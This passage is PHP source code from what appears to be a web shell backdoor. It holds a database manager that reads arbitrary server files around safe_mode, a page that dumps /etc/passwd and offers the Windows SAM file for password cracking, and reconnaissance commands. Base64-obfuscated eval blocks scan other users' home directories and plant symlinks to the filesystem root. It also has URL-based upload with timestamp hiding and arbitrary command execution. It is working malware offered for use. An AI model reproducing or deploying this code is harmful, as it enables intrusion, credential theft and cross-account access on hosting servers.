    echo "<td>&nbsp;<a href=\"".$sql_surl."sql_x=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."x=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_x=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."x=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_x=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."x=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
    echo "</tr>";
    $i++;
   }
   echo "<tr bgcolor=\"000000\">";
   echo "<td><center><b>+</b></center></td>";
   echo "<td><center><b>".$i." table(s)</b></center></td>";
   echo "<td><b>".$trows."</b></td>";
   echo "<td>".$row[1]."</td>";
   echo "<td>".$row[10]."</td>";
   echo "<td>".$row[11]."</td>";
   echo "<td><b>".view_size($tsize)."</b></td>";
   echo "<td></td>";
   echo "</tr>";
   echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."x=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_x\">";
   echo "<option value=\"\">With selected:</option>";
   echo "<option value=\"tbldrop\">Drop</option>";
   echo "<option value=\"tblempty\">Empty</option>";
   echo "<option value=\"tbldump\">Dump</option>";
   echo "<option value=\"tblcheck\">Check table</option>";
   echo "<option value=\"tbloptimize\">Optimize table</option>";
   echo "<option value=\"tblrepair\">Repair table</option>";
   echo "<option value=\"tblanalyze\">Analyze table</option>";
   echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
   mysql_free_result($result);
   }
  }
  }
  }
 }
 else {
  $acts = array("","newdb","serverstatus","servervars","processes","getfile");
  if (in_array($sql_x,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="x" value="sql"><input type="hidden" name="sql_x" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="x" value="sql"><input type="hidden" name="sql_x" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
  if (!empty($sql_x)) {
  echo "<hr size=\"1\" noshade>";
  if ($sql_x == "newdb") {
   echo "<b>";
   if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
   else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  }
  if ($sql_x == "serverstatus") {
   $result = mysql_query("SHOW STATUS", $sql_sock);
   echo "<center><b>Server-status variables:</b><br><br>";
   echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
   while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
   echo "</table></center>";
   mysql_free_result($result);
  }
  if ($sql_x == "servervars") {
   $result = mysql_query("SHOW VARIABLES", $sql_sock);
   echo "<center><b>Server variables:</b><br><br>";
   echo "<TABLE cellSpacing=0 cellPadding=0 bgcolor=#000000 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
   while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
   echo "</table>";
   mysql_free_result($result);
  }
  if ($sql_x == "processes") {
   if (!empty($kill)) {
    $query = "KILL ".$kill.";";
    $result = mysql_query($query, $sql_sock);
    echo "<b>Process #".$kill." was killed.</b>";
   }
   $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
   echo "<center><b>Processes:</b><br><br>";
   echo "<TABLE cellSpacing=0 cellPadding=2 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
   while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_x=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
   echo "</table>";
   mysql_free_result($result);
  }
  if ($sql_x == "getfile")
  {
   $tmpdb = $sql_login."_tmpdb";
   $select = mysql_select_db($tmpdb);
   if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
   if ($select)
   {
   $created = FALSE;
   mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
   mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
   $result = mysql_query("SELECT * FROM tmp_file;");
   if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
   else
   {
    for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
    $f = "";
    while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("
",$row);}
    if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
    else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
    mysql_free_result($result);
    mysql_query("DROP TABLE tmp_file;");
   }
   }
   mysql_drop_db($tmpdb); 
  }
  }
 }
}
echo "</td></tr></table>";
if ($sql_sock) {
 $affected = @mysql_affected_rows($sql_sock);
 if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
 echo "<tr><td><center><b>Affected rows : ".$affected."</center></td></tr>";
}
echo "</table>";
}
if ($x == "phpinfo") {@ob_clean(); phpinfo(); bogelexit();}
if ($x == "security") {
 echo "<div class=barheader>.: Server Security Information :.</div>".
    "<table>".
    "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>";
 echo "<td>Password File</td><td>";
 if (!$win) {
  if ($nixpasswd) {
   if ($nixpasswd == 1) {$nixpasswd = 0;}
   echo "*nix /etc/passwd:<br>";
   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
   echo "<form action=\"".$surl."\"><input type=hidden name=x value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
   $i = $nixpwd_s;
   while ($i < $nixpwd_e) {
    $uid = posix_getpwuid($i);
    if ($uid) {
     $uid["dir"] = "<a href=\"".$surl."x=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
     echo join(":",$uid)."<br>";
    }
    $i++;
   }
  }
  else {echo "<a href=\"".$surl."x=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a>";}
 }
 else {
  $v = $_SERVER["WINDIR"]."
epair\sam";
  if (file_get_contents($v)) {echo "<td colspan=2><div class=fxerrmsg>You can't crack Windows passwords(".$v.")</div></td></tr>"; }
  else {echo "You can crack Windows passwords. <a href=\"".$surl."x=f&f=sam&d=".$_SERVER["WINDIR"]."
epair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</td></tr>";}
 }
 echo "</td></tr>";
 echo "<tr><td>Config Files</td><td>";
 if (!$win) {
  $v = array(
    array("User Domains","/etc/userdomains"),
    array("Cpanel Config","/var/cpanel/accounting.log"),
    array("Apache Config","/usr/local/apache/conf/httpd.conf"),
    array("Apache Config","/etc/httpd.conf"),
    array("Syslog Config","/etc/syslog.conf"),
    array("Message of The Day","/etc/motd"),
    array("Hosts","/etc/hosts")
  );
  $sep = "/";
 }
 else {
  $windir = $_SERVER["WINDIR"];
  $etcdir = $windir . "\system32\drivers\etc\";
  $v = array(
    array("Hosts",$etcdir."hosts"),
    array("Local Network Map",$etcdir."networks"),
    array("LM Hosts",$etcdir."lmhosts.sam"),
  );
  $sep = "\";
 }
 foreach ($v as $sec_arr) {
  $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
  $sec_d = rtrim($sec_arr[1],$sec_f);
  $sec_full = $sec_d.$sec_f;
  $sec_d = rtrim($sec_d,$sep);
  if (file_get_contents($sec_full)) {
   echo " [ <a href=\"".$surl."x=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><u><b>".$sec_arr[0]."</b></u></a> ] ";
  }
 }
 echo "</td></tr>";

 function displaysecinfo($name,$value) {
  if (!empty($value)) {
   echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>";
  }
 }
 if (!$win) {
  displaysecinfo("OS Version",myshellexec("cat /proc/version"));
  displaysecinfo("Kernel Version",myshellexec("sysctl -a | grep version"));
  displaysecinfo("Distrib Name",myshellexec("cat /etc/issue"));
  displaysecinfo("Distrib Name (2)",myshellexec("cat /etc/issue.rpmnew"));
  displaysecinfo("CPU Info",myshellexec("cat /proc/cpuinfo"));
  displaysecinfo("RAM",myshellexec("free -m"));
  displaysecinfo("HDD Space",myshellexec("df -h"));
  displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
  displaysecinfo("Mount Options",myshellexec("cat /etc/fstab"));
  displaysecinfo("cURL installed?",myshellexec("which curl"));
	displaysecinfo("lynx installed?",myshellexec("which lynx"));
  displaysecinfo("links installed?",myshellexec("which links"));
  displaysecinfo("fetch installed?",myshellexec("which fetch"));
  displaysecinfo("GET installed?",myshellexec("which GET"));
  displaysecinfo("perl installed?",myshellexec("which perl"));
  displaysecinfo("Where is Apache?",myshellexec("whereis apache"));
  displaysecinfo("Where is perl?",myshellexec("whereis perl"));
  displaysecinfo("Locate proftpd.conf",myshellexec("locate proftpd.conf"));
  displaysecinfo("Locate httpd.conf",myshellexec("locate httpd.conf"));
  displaysecinfo("Locate my.conf",myshellexec("locate my.conf"));
  displaysecinfo("Locate psybnc.conf",myshellexec("locate psybnc.conf"));
 }
 else {
  displaysecinfo("OS Version",myshellexec("ver"));
  displaysecinfo("Account Settings",myshellexec("net accounts"));
 }
 echo "</table>
";
}

if ($x == "jump") {
$ngipmuj = base64_decode("YmFyX2hlYWRlcigiLjogSnVtcGluZyA6LiIpOw0KCSgkc20gPSBpbmlfZ2V0KCdzYWZlX21vZGUnKSA9PSAwKSA/ICRzbSA9ICdvZmYnOiBkaWUoJzxmb250IHNpemU9IjQiIGNvbG9yPSIjMDAwMDAwIiBmYWNlPSJDYWxpYnJpIj48Yj5FcnJvcjogU2FmZV9tb2RlID0gT248L2I+PC9mb250PicpOw0Kc2V0X3RpbWVfbGltaXQoMCk7DQpAJHBhc3N3ZCA9IGZvcGVuKCcvZXRjL3Bhc3N3ZCcsJ3InKTsNCmlmICghJHBhc3N3ZCkgeyBkaWUoJzxmb250IHNpemU9IjQiIGNvbG9yPSIjMDAwMDAwIiBmYWNlPSJDYWxpYnJpIj48Yj5bLV0gRXJyb3IgOiBDb3VkbmB0IFJlYWQgL2V0Yy9wYXNzd2Q8L2I+PC9mb250PicpOyB9DQokcHViID0gYXJyYXkoKTsNCiR1c2VycyA9IGFycmF5KCk7DQokY29uZiA9IGFycmF5KCk7DQokaSA9IDA7DQp3aGlsZSghZmVvZigkcGFzc3dkKSkNCnsNCiRzdHIgPSBmZ2V0cygkcGFzc3dkKTsNCmlmICgkaSA+IDEwMCkNCnsNCiAgJHBvcyA9IHN0cnBvcygkc3RyLCc6Jyk7DQogICR1c2VybmFtZSA9IHN1YnN0cigkc3RyLDAsJHBvcyk7DQogICRkaXJ6ID0gJy9ob21lLycuJHVzZXJuYW1lLicvcHVibGljX2h0bWwvJzsNCiAgaWYgKCgkdXNlcm5hbWUgIT0gJycpKQ0KICB7DQogICBpZiAoaXNfcmVhZGFibGUoJGRpcnopKQ0KICAgew0KICAgIGFycmF5X3B1c2goJHVzZXJzLCR1c2VybmFtZSk7DQogICAgYXJyYXlfcHVzaCgkcHViLCRkaXJ6KTsNCiAgIH0NCiAgfQ0KICAgfQ0KJGkrKzsNCn0NCmVjaG8gIlxuIDxmb250IHNpemU9JzMnIGNvbG9yPScjMDA4MDgwJyBmYWNlPSdDYWxpYnJpJz48YnI+Wy1dPT09PT09PT09PT09PT09PT09WyBTVEFSVCBdPT09PT09PT09PT09PT09PT09Wy1dICA8YnI+PC9mb250PlxuIjsNCmZvcmVhY2ggKCR1c2VycyBhcyAkdXNlcikNCnsNCmVjaG8gIjxmb250IHNpemU9JzMnIGNvbG9yPScjZWUwODA4JyBmYWNlPSdDYWxpYnJpJz4gWytdIC9ob21lLyR1c2VyL3B1YmxpY19odG1sLzwvZm9udD48YnIvPiI7DQp9DQplY2hvICJcbiA8Zm9udCBzaXplPSczJyBjb2xvcj0nIzAwODA4MCcgZmFjZT0nQ2FsaWJyaSc+PGJyPlstXT09PT09PT09PT09PT09PT09PVsgRklOSVNIIF09PT09PT09PT09PT09PT09PT1bLV0gPGJyPjwvZm9udD5cbiI7DQplY2hvICJcbiA8Zm9udCBzaXplPScyJyBjb2xvcj0nIzgwMDAwMCcgZmFjZT0nQ2FsaWJyaSc+SnVtcGluZyBTY2FubmVyIGlzIENvbXBsZXRlZCE8L2ZvbnQ+XG4iOw==");
eval ($ngipmuj);
}

if ($x == "sym") {
$knilmys = base64_decode("QHNldF90aW1lX2xpbWl0KDApOw0KJHJ4MSA9ICdodHRwOi8vJy4kX1NFUlZFUlsnU0VSVkVSX05BTUUnXS4kX1NFUlZFUlsnUkVRVUVTVF9VUkknXTsNCiRyeDIgPWV4cGxvZGUoJy8nLCRyeDEgKTsNCiRyeDEgPXN0cl9yZXBsYWNlKCRyeDJbY291bnQoJHJ4MiktMV0sJycsJHJ4MSApOw0KDQpAbWtkaXIoJ3N5bScsMDc3Nyk7DQokcngxICA9ICJPcHRpb25zIGFsbCBcbiBEaXJlY3RvcnlJbmRleCBTdXguaHRtbCBcbiBBZGRUeXBlIHRleHQvcGxhaW4gLnBocCBcbiBBZGRIYW5kbGVyIHNlcnZlci1wYXJzZWQgLnBocCBcbiAgQWRkVHlwZSB0ZXh0L3BsYWluIC5odG1sIFxuIEFkZEhhbmRsZXIgdHh0IC5odG1sIFxuIFJlcXVpcmUgTm9uZSBcbiBTYXRpc2Z5IEFueSI7DQokcngyID1AZm9wZW4gKCdzeW0vLmh0YWNjZXNzJywndycpOw0KZndyaXRlKCRyeDIgLCRyeDEpOw0KQHN5bWxpbmsoJy8nLCdzeW0vcm9vdCcpOw0KaWYoaXNzZXQoJF9SRVFVRVNUWyd4J10pKQ0Kew0Kc3dpdGNoICgkX1JFUVVFU1RbJ3gnXSkNCnsNCmNhc2UgJ3N5bSc6DQokcng0ID0gQGZpbGUoJy9ldGMvbmFtZWQuY29uZicpOw0KaWYoISRyeDQpDQp7DQpkaWUgKCIgY2FuJ3QgcmVhZCAvZXRjL25hbWVkLmNvbmYiKTsNCn0NCmVsc2UNCnsNCmVjaG8gIjxkaXYgY2xhc3M9J3RtcCc+PHRhYmxlIGFsaWduPSdjZW50ZXInIHdpZHRoPSc0MCUnPjx0ZD5Eb21haW5zPC90ZD48dGQ+VXNlcnM8L3RkPjx0ZD5TeW1saW5rIDwvdGQ+IjsNCmZvcmVhY2goJHJ4NCBhcyAkcng1KXsNCmlmKGVyZWdpKCd6b25lJywkcng1KSl7DQpwcmVnX21hdGNoX2FsbCgnI3pvbmUgIiguKikiIycsJHJ4NSwkcng2KTsNCmZsdXNoKCk7DQppZihzdHJsZW4odHJpbSgkcng2WzFdWzBdKSkgPjIpew0KJHJ4NyA9IHBvc2l4X2dldHB3dWlkKEBmaWxlb3duZXIoJy9ldGMvdmFsaWFzZXMvJy4kcng2WzFdWzBdKSk7DQokcng4ID0gJHJ4N1snbmFtZSddIDsNCkBzeW1saW5rKCcvJywnc3ltL3Jvb3QnKTsNCiRyeDggPSAkcng2WzFdWzBdOw0KJHJ4OSA9ICdcLmlyJzsNCiRyeDEwID0gJ1wuaWwnOw0KaWYgKGVyZWdpKCIkcng5Iiwkcng2WzFdWzBdKSBvciBlcmVnaSgiJHJ4MTAiLCRyeDZbMV1bMF0pICkNCnsNCiRyeDggPSAiPGRpdiBzdHlsZT0nIGNvbG9yOiAjRkYwMDAwIDsgdGV4dC1zaGFkb3c6IDBweCAwcHggMXB4IHJlZDsgJz4iLiRyeDZbMV1bMF0uJzwvZGl2Pic7DQp9DQplY2hvICINCjx0cj4NCg0KPHRkPg0KPGRpdiBjbGFzcz0nZG9tJz48YSB0YXJnZXQ9J19ibGFuaycgaHJlZj1odHRwOi8vd3d3LiIuJHJ4NlsxXVswXS4nLz4nLiRyeDguJyA8L2E+IDwvZGl2Pg0KPC90ZD4NCg0KDQo8dGQ+DQonLiRyeDdbJ25hbWUnXS4iDQo8L3RkPg0KDQo8dGQ+DQo8YSBocmVmPSdzeW0vcm9vdC9ob21lLyIuJHJ4N1snbmFtZSddLiIvcHVibGljX2h0bWwnIHRhcmdldD0nX2JsYW5rJz5zeW1saW5rIDwvYT4NCjwvdGQ+DQoNCjwvdHI+PC9kaXY+ICI7DQpmbHVzaCgpOw0KfQ0KfQ0KfQ0KfQ0KfQ0KfQ==");
eval ($knilmys);
}

if ($x == "mkfile") {
if ($mkfile != $d) {
 if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object already exists!";}
 elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied!";}
 else {$x = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
}
else {$x = $dspact = "ls";}

}
if ($x == "chmod") {
 $mode = fileperms($d.$f);
 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
 else {
  $form = TRUE;
  if ($chmod_submit)
 {
  $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  if (chmod($d.$f,$octet)) {$x = "ls"; $form = FALSE; $err = "";}
  else {$err = "Can't chmod to ".$octet.".";}
 }
 if ($form)
 {
  $perms = parse_perms($mode);
  echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=x value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
 }
}
}
if ($x == "upload") {
 $uploadmess = "";
 $uploadpath = str_replace("\",DIRECTORY_SEPARATOR,$uploadpath);
 if (empty($uploadpath)) {$uploadpath = $d;}
 elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
 if (!empty($submit)) {
  global $_FILES;
  $uploadfile = $_FILES["uploadfile"];
  if (!empty($uploadfile["tmp_name"])) {
   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
   else {$destin = $userfilename;}
   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
    $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
   }
   else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
  }
  elseif (!empty($uploadurl)) {
   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
   else {
    $destin = explode("/",$destin);
    $destin = $destin[count($destin)-1];
    if (empty($destin)) {
     $i = 0;
     $b = "";
     while(file_exists($uploadpath.$destin)) {
      if ($i > 0) {$b = "_".$i;}
      $destin = "upload".$b;
      $i++;
     }
    }
   }
   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorrect URL!</b>";}
   else {
    $st = getmicrotime();
    $content = @file_get_contents($uploadurl);
    $dt = round(getmicrotime()-$st,4);
    if (!$content) {$uploadmess .= "Can't download file!";}
    else {
     if ($filestealth) {$stat = stat($uploadpath.$destin);}
     $fp = fopen($uploadpath.$destin,"w");
     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
     else {
      fwrite($fp,$content,strlen($content));
      fclose($fp);
      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
      $uploadmess .= "File saved from ".$uploadurl." !";
     }
    }
   }
  }
  else { echo "No file to upload!"; }
 }
 if ($miniform) {
  echo "<b>".$uploadmess."</b>";
  $x = "ls";
 }
 else {
  echo "<table><tr><td colspan=2 class=barheader>".
     ".: File Upload :.</td>".
     "<td colspan=2>".$uploadmess."</td></tr>".
     "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."x=upload&d=".urlencode($d)."\" method=POST>".
     "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
     "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
     "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
     "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
     "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
     "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
     "</form></td></tr></table>";
 }
}
if ($x == "delete") {
 $delerr = "";
 foreach ($actbox as $v) {
  $result = FALSE;
  $result = fs_rmobj($v);
  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
 }
 if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
 $x = "ls";
}
if (!$usefsbuff) {
 if (($x == "paste") or ($x == "copy") or ($x == "cut") or ($x == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";}
}
else {
 if ($x == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ca_sess_put($sess_data); $x = "ls"; }
 elseif ($x == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ca_sess_put($sess_data); $x = "ls";}
 elseif ($x == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} ca_sess_put($sess_data); $x = "ls";}
 if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ca_sess_put($sess_data);}
 elseif ($actpastebuff) {
  $psterr = "";
  foreach($sess_data["copy"] as $k=>$v) {
   $to = $d.basename($v);
   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
   if ($copy_unset) {unset($sess_data["copy"][$k]);}
  }
  foreach($sess_data["cut"] as $k=>$v) {
   $to = $d.basename($v);
   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
   unset($sess_data["cut"][$k]);
  }
  ca_sess_put($sess_data);
  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  $x = "ls";
 }
 elseif ($actarcbuff) {
  $arcerr = "";
  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  else {$ext = ".tar.gz";}
  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  $cmdline .= " ".$actarcbuff_path;
  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  foreach($objects as $v) {
   $v = str_replace("\",DIRECTORY_SEPARATOR,$v);
   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
   if (is_dir($v)) {
    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
    $v .= "*";
   }
   $cmdline .= " ".$v;
  }
  $tmp = realpath(".");
  chdir($d);
  $ret = myshellexec($cmdline);
  chdir($tmp);
  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  $ret = str_replace("
","
",$ret);
  $ret = explode("
",$ret);
  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  foreach($sess_data["cut"] as $k=>$v) {
   if (in_array($v,$ret)) {fs_rmobj($v);}
   unset($sess_data["cut"][$k]);
  }
  ca_sess_put($sess_data);
  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  $x = "ls";
 }
 elseif ($actpastebuff) {
  $psterr = "";
  foreach($sess_data["copy"] as $k=>$v) {
   $to = $d.basename($v);
   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
   if ($copy_unset) {unset($sess_data["copy"][$k]);}
  }
  foreach($sess_data["cut"] as $k=>$v) {
   $to = $d.basename($v);
   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
   unset($sess_data["cut"][$k]);
  }
  ca_sess_put($sess_data);
  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  $x = "ls";
 }
}
if ($x == "cmd") {
 @chdir($chdir);
 if (!empty($submit)) {
  echo "<div class=barheader>.: Result of Command Execution :.</div>";
  $olddir = realpath(".");
  @chdir($d);
  $ret = myshellexec($cmd);
  $ret = convert_cyr_string($ret,"d","w");
  if ($cmd_txt) {
   $rows = count(explode("
",$ret))+1;
   if ($rows < 10) {$rows = 10; }
   if ($msie) { $cols = 113; }
   else { $cols = 117;}
   echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
  }
  else {echo $ret."<br>";}
  @chdir($olddir);
 }
 else {
  echo "<b>Command Execution</b>";
  if (empty($cmd_txt)) {$cmd_txt = TRUE;}
 }
}
if ($x == "ls") {
 if (count($ls_arr) > 0) { $list = $ls_arr; }
 else {
  $list = array();
  if ($h = @opendir($d)) {
   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
   closedir($h);
  }
 }
 if (count($list) == 0) { echo "<div class=fxerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
 else {
  $objects = array();
  $vd = "f"; 
  if ($vd == "f") {
   $objects["head"] = array();
   $objects["folders"] = array();
   $objects["links"] = array();
   $objects["files"] = array();
   foreach ($list as $v) {
    $o = basename($v);
    $row = array();
    if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
    elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
    elseif (is_dir($v)) {
     if (is_link($v)) {$type = "LINK";}
     else {$type = "DIR";}
     $row[] = $v;
     $row[] = $type;
    }
    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
    $row[] = filemtime($v);
    if (!$win) {
     $ow = posix_getpwuid(fileowner($v));
